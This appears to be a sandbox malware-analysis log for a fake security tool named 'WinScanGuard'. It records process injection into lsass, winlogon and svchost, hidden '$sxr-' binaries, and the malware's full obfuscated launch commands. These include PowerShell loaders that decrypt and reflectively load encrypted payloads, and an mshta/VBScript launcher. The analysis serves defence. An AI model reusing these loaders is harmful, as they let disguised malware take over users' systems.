Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 731629A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E8629A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 473C29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F9D29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83BC29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3F729A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A41529A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BDF329A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C02629A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC7529A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0BD29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 613F29A0
Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 3202102
Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 2252102
Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 2402102
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140002000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: E738D0C010
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 402000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 25D008
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140002000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: F3FC80B010
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 402000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 6E6008
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140002000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 5BD5B55010
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 402000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 646008
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 729C122010
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: BD8008
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 4984A9010
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 4EA1005010
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 8D7008
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 7E9008
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: F980ACF010
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: DB297B010
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 3195008
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 31C1008Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 86602A3010Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 28A008Jump to behavior
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1A0000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 4000000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 20E0000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 23C0000
              Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\$sxr-powershell.exe base: 28542880000 (11 identical entries)
              Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000 (10 identical entries)
              Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 32E0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A661330000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1D0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC6F0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0B70000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A661390000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAF200000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A879C0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17953770000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2F90000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2230000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 23E0000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 1450000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC7B0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0C30000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A661450000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAB14E0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A87F70000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 179537D0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2295D590000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25306E60000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC750000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0BD0000
              Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6613F0000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3200000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2250000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2400000
              Source: C:\Windows\SysWOW64\dllhost.exe | Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 1470000
              Source: C:\Windows\$sxr-cmd.exe | Process created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqW
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Thread register set: target process: 4916
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Thread register set: target process: 1228
              Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 1908
              Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 5800
              Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 2740
              Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 6720
              Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 6700
              Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 6020
              Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 5408
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe "winscanguard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function olsgt($qhqwz){ $fhdgh=[system.security.cryptography.aes]::create(); $fhdgh.mode=[system.security.cryptography.ciphermode]::cbc; $fhdgh.padding=[system.security.cryptography.paddingmode]::pkcs7; $fhdgh.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('onjsi5fjjzv4aoembvugvr4ituuvmgvnrnjejyrp0wq='); $fhdgh.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('clqnywl0vsdfd4x+5ykrxq=='); $spflb=$fhdgh.createdecryptor(); $return_var=$spflb.transformfinalblock($qhqwz, 0, $qhqwz.length); $spflb.dispose(); $fhdgh.dispose(); $return_var;}function rnhms($qhqwz){ $wxvgk=new-object system.io.memorystream(,$qhqwz); $bpcbe=new-object system.io.memorystream; $couvu=new-object system.io.compression.gzipstream($wxvgk, [io.compression.compressionmode]::decompress); $couvu.copyto($bpcbe); $couvu.dispose(); $wxvgk.dispose(); $bpcbe.dispose(); $bpcbe.toarray();}function zatie($qhqwz,$cjuqy){ $ospmd=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$qhqwz); $xwtdt=$ospmd.entrypoint; $xwtdt.invoke($null, $cjuqy);}$ylwdr=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\winscanguard_v.2.1.bat').split([environment]::newline);foreach ($xuiqg in $ylwdr) { if ($xuiqg.startswith('seroxen')) { $sogsv=$xuiqg.substring(7); break; }}$zermu=[string[]]$sogsv.split('\');$tzgbc=rnhms (olsgt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($zermu[0])));$ttdxt=rnhms (olsgt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($zermu[1])));zatie $ttdxt (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));zatie $tzgbc (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));
              Source: unknown | Process created: C:\Windows\$sxr-mshta.exe c:\windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'vb'+'sc'+'ri'+'pt'+'\x22>'+'se'+'t\x20'+'ob'+'js'+'he'+'ll'+'\x20='+'\x20c'+'re'+'at'+'eo'+'bj'+'ec'+'t('+'\x22w'+'sc'+'ri'+'pt'+'.s'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'sh'+'el'+'l.'+'ru'+'n\x20'+'\x22c:\\windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bwtljbkboghiyuerhoar4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
